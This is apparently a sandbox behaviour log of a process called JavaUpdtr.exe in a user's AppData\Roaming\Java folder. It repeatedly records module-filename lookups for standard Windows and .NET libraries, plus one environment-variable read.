Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\USP10.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\IMM32.DLL, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\MSCTF.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\VERSION.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\MSVCR80.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\shell32.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\ole32.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\profapi.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\uxtheme.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\08d608378aa405adc844f3cf36974b8c\Microsoft.VisualBasic.ni.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\WindowsCodecs.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\psapi.dll, size = 2048 True 1
Environment Get Environment String name = windir, result_out = C:\Windows True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Java\JavaUpdtr.exe, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\SysWOW64\ntdll.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\SYSTEM32\MSCOREE.DLL, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\KERNEL32.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\KERNELBASE.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\ADVAPI32.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\msvcrt.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\SysWOW64\sechost.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\RPCRT4.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\SspiCli.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\CRYPTBASE.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\SHLWAPI.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\GDI32.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\USER32.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\LPK.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\USP10.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\IMM32.DLL, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\MSCTF.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\VERSION.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\MSVCR80.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\shell32.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\ole32.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\profapi.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\uxtheme.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\08d608378aa405adc844f3cf36974b8c\Microsoft.VisualBasic.ni.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\WindowsCodecs.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\psapi.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Java\JavaUpdtr.exe, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\SysWOW64\ntdll.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\SYSTEM32\MSCOREE.DLL, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\KERNEL32.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\KERNELBASE.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\ADVAPI32.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\msvcrt.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\SysWOW64\sechost.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\RPCRT4.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\SspiCli.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\CRYPTBASE.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\SHLWAPI.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\GDI32.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\USER32.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\LPK.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\USP10.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\IMM32.DLL, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\MSCTF.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\VERSION.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\MSVCR80.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\shell32.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\ole32.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\profapi.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\uxtheme.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\08d608378aa405adc844f3cf36974b8c\Microsoft.VisualBasic.ni.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\WindowsCodecs.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\psapi.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Java\JavaUpdtr.exe, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\SysWOW64\ntdll.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\SYSTEM32\MSCOREE.DLL, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\KERNEL32.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\KERNELBASE.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\ADVAPI32.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\msvcrt.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\SysWOW64\sechost.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\RPCRT4.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\SspiCli.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\CRYPTBASE.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\SHLWAPI.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\GDI32.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\USER32.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\LPK.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\USP10.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\IMM32.DLL, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\MSCTF.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\VERSION.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\MSVCR80.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\shell32.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\ole32.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\profapi.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\uxtheme.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\08d608378aa405adc844f3cf36974b8c\Microsoft.VisualBasic.ni.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\WindowsCodecs.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\psapi.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Java\JavaUpdtr.exe, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\SysWOW64\ntdll.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\SYSTEM32\MSCOREE.DLL, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\KERNEL32.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\KERNELBASE.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\ADVAPI32.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\msvcrt.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\SysWOW64\sechost.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\RPCRT4.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\SspiCli.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\CRYPTBASE.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\SHLWAPI.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\GDI32.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\USER32.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\LPK.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\USP10.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\IMM32.DLL, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\MSCTF.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\VERSION.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\MSVCR80.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\shell32.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\ole32.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\profapi.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll, size = 2048 True 1
